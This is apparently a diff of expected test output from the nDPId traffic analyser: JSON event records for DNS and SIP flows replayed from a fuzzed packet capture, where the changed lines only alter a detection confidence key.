00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1120470216686,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":17,"thread_ts_msec":1120470216686,"pkt":"ADBUADRWAODtAW69CABFAAAlcwAAAIARTJrAqAECwKgBAQrJADUAMPj\/K\/YAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1120470216688,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470216688,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CskAR9t7K\/aAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470216686,"flow_last_seen":1120470216688,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1120470216688,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2761,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470216686,"flow_last_seen":1120470216688,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1120470216688,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2761,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470216783,"flow_last_seen":1120470216783,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470216783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1120470216783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470216783,"pkt":"ADBUADRWAODtAW69CABFAABIar0AAIARTJTAqAECwKgBAQrKADUANKsCfvgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470216783,"flow_last_seen":1120470216783,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470216783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470216783,"flow_last_seen":1120470216783,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470216783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1120470217778,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470217778,"pkt":"ADBUADRWAODtAW69CABFAABIar4AAIARTJPAqAECwKgBAQrKADUANKsCfvgBAABXAAAAAAAABF9zaXAEX3VkcANzaXAJY3m9ZXJjaXR5AmRrAAAhAAE="} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":315,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470216783,"flow_last_seen":1120470217778,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470217778,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":315,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470216783,"flow_last_seen":1120470217778,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470217778,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1120470219780,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470219780,"pkt":"ADBUADRWAODtAW69CABFAABIar8AAIARTJLAqAECwKgBAQrKADUANKsCfvgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AnNrAAAhAAE="} -00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":316,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470216783,"flow_last_seen":1120470219780,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.sk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":316,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470216783,"flow_last_seen":1120470219780,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.sk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":317,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":29440,"global_ts_msec":1120470221783} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":317,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":29440,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470219780,"pkt":"ADBUADRWAODtAW4lcwBFAABIasAAAIARTJHAqAECwKglcwDKADUANKsCfvgBAAABAAAAAAgABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":318,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120470225789} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":318,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470219780,"pkt":"ADBUADRWAODtAW69CACbAABIasEEAIARTJDAqAECwKgBAQrKADUANKsCfvgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032081,"flow_last_seen":1120470032081,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032081,"flow_last_seen":1120470032081,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470032083,"flow_last_seen":1120470032083,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2745,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470032083,"flow_last_seen":1120470032083,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2745,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470035175,"flow_last_seen":1120470035175,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470032178,"flow_last_seen":1120470041184,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":29440,"global_ts_msec":1120470233791} 00397{"packet_event_id":1,"packet_event_name":"packet","packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":82,"pkt_type":29440,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":82,"pkt_l4_len":0,"thread_ts_msec":1120470219780,"pkt":"ADBUADRWAODtSm4lcwBFAABEasIAAIARTJPAqAECwKgBAQrLADUAMHT6r\/kAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470233792,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1120470233792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470233792,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CssAR1d2r\/mAAAAmcwEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAYAAJxAACwlsb2NhbGhvc3QA"} -00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":320,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470233792,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":38,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":320,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470233792,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":38,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":321,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2176,"global_ts_msec":1120470233794} 01441{"packet_event_id":1,"packet_event_name":"packet","packet_id":321,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":867,"pkt_type":2176,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":867,"pkt_l4_len":0,"thread_ts_msec":1120470233792,"pkt":"ADBUADRWAODtAW69CIBFAANVaMMAAIARFRXAqAEC1PIhIxPEE8QDQYjhSU5WSVRFIHNpcDowMDk3MjM5Mjg3MDQ0QHNpcC5jeWJlcmNpdHkuZGsgU0lQL1MuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjo1MDYwO2JyYW5jaD16OWhHNGJLbnA4NTIxMzY5NC00MzBhYTFkZTGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":322,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233796,"flow_last_seen":1120470233796,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470233796,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1120470233796,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470233796,"pkt":"ADBUADRWAODtAW69CABFAABIasQAAIARTI3AqAECwKgBAQrMADUANEn93\/sBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233796,"flow_last_seen":1120470233796,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470233796,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233796,"flow_last_seen":1120470233796,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470233796,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":323,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470234292} 01442{"packet_event_id":1,"packet_event_name":"packet","packet_id":323,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":867,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":867,"pkt_l4_len":0,"thread_ts_msec":1120470233796,"pkt":"ADBUADRWAOCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 